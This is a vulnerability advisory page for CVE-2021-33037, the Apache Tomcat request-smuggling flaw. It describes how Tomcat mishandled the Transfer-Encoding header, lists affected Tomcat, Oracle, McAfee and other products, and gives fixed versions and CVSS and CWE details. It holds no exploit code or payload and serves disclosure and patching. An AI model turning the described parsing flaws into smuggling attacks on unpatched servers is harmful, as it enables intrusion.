First published: Mon Jul 12 2021(Updated: )
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.
Credit: security@apache.org security@apache.org
Affected Software | Affected Version | How to fix |
---|---|---|
redhat/jws5-tomcat | <0:9.0.50-3.redhat_00004.1.el7 | 0:9.0.50-3.redhat_00004.1.el7 |
redhat/jws5-tomcat-native | <0:1.2.30-3.redhat_3.el7 | 0:1.2.30-3.redhat_3.el7 |
redhat/jws5-tomcat-vault | <0:1.1.8-4.Final_redhat_00004.1.el7 | 0:1.1.8-4.Final_redhat_00004.1.el7 |
redhat/jws5-tomcat | <0:9.0.50-3.redhat_00004.1.el8 | 0:9.0.50-3.redhat_00004.1.el8 |
redhat/jws5-tomcat-native | <0:1.2.30-3.redhat_3.el8 | 0:1.2.30-3.redhat_3.el8 |
redhat/jws5-tomcat-vault | <0:1.1.8-4.Final_redhat_00004.1.el8 | 0:1.1.8-4.Final_redhat_00004.1.el8 |
redhat/tomcat | <10.0.7 | 10.0.7 |
redhat/tomcat | <9.0.48 | 9.0.48 |
redhat/tomcat | <8.5.68 | 8.5.68 |
maven/org.apache.tomcat:tomcat | >=8.5.0<8.5.68 | 8.5.68 |
maven/org.apache.tomcat:tomcat | >=9.0.0-M1<9.0.48 | 9.0.48 |
maven/org.apache.tomcat:tomcat | >=10.0.0-M1<10.0.7 | 10.0.7 |
Apache Tomcat | >=8.5.0<=8.5.66 | |
Apache Tomcat | >9.0.0<=9.0.46 | |
Apache Tomcat | >10.0.0<=10.0.6 | |
Apache TomEE | =8.0.6 | |
Debian Debian Linux | =9.0 | |
Debian Debian Linux | =10.0 | |
Oracle Agile PLM | =9.3.6 | |
Oracle Communications Cloud Native Core Policy | =1.14.0 | |
Oracle Communications Cloud Native Core Service Communication Proxy | =1.14.0 | |
Oracle Communications Diameter Signaling Router | >=8.0.0.0<=8.5.0.2 | |
Oracle Communications Instant Messaging Server | =10.0.1.5.0 | |
Oracle Communications Policy Management | =12.5.0 | |
Oracle Communications Pricing Design Center | =12.0.0.3.0 | |
Oracle Communications Session Report Manager | >=8.0.0<=8.2.4.0 | |
Oracle Communications Session Route Manager | >=8.0.0<=8.2.4 | |
Oracle Graph Server And Client | <21.4 | |
Oracle Healthcare Translational Research | =4.1.0 | |
Oracle Hospitality Cruise Shipboard Property Management System | =20.1.0 | |
Oracle Instantis Enterprisetrack | =17.1 | |
Oracle Instantis Enterprisetrack | =17.2 | |
Oracle Instantis Enterprisetrack | =17.3 | |
Oracle Managed File Transfer | =12.2.1.3.0 | |
Oracle Managed File Transfer | =12.2.1.4.0 | |
Oracle Mysql Enterprise Monitor | <=8.0.25 | |
Oracle SD-WAN Edge | =9.0 | |
Oracle SD-WAN Edge | =9.1 | |
Oracle Secure Global Desktop | =5.6 | |
Oracle Utilities Testing Accelerator | =6.0.0.1.1 | |
Oracle Utilities Testing Accelerator | =6.0.0.2.2 | |
Oracle Utilities Testing Accelerator | =6.0.0.3.1 | |
McAfee ePolicy Orchestrator | <5.10.0 | |
McAfee ePolicy Orchestrator | =5.10.0 | |
McAfee ePolicy Orchestrator | =5.10.0-update_1 | |
McAfee ePolicy Orchestrator | =5.10.0-update_10 | |
McAfee ePolicy Orchestrator | =5.10.0-update_2 | |
McAfee ePolicy Orchestrator | =5.10.0-update_3 | |
McAfee ePolicy Orchestrator | =5.10.0-update_4 | |
McAfee ePolicy Orchestrator | =5.10.0-update_5 | |
McAfee ePolicy Orchestrator | =5.10.0-update_6 | |
McAfee ePolicy Orchestrator | =5.10.0-update_7 | |
McAfee ePolicy Orchestrator | =5.10.0-update_8 | |
McAfee ePolicy Orchestrator | =5.10.0-update_9 | |
IBM DRM | <=2.0.6 | |
debian/tomcat9 | 9.0.43-2~deb11u10 9.0.70-2 9.0.95-1 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
(Appears in the following advisories)
The severity of CVE-2021-33037 is medium with a CVSS score of 4.3.
CVE-2021-33037 affects Apache Tomcat versions 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46, and 8.5.0 to 8.5.66.
The remedy for CVE-2021-33037 is to upgrade Apache Tomcat to version 10.0.7, 9.0.48, or 8.5.68.
You can find more information about CVE-2021-33037 at the following references: [CVE-2021-33037 at CVE.org](https://www.cve.org/CVERecord?id=CVE-2021-33037) and [CVE-2021-33037 at NIST](https://nvd.nist.gov/vuln/detail/CVE-2021-33037).
The CWE for CVE-2021-33037 is CWE-444.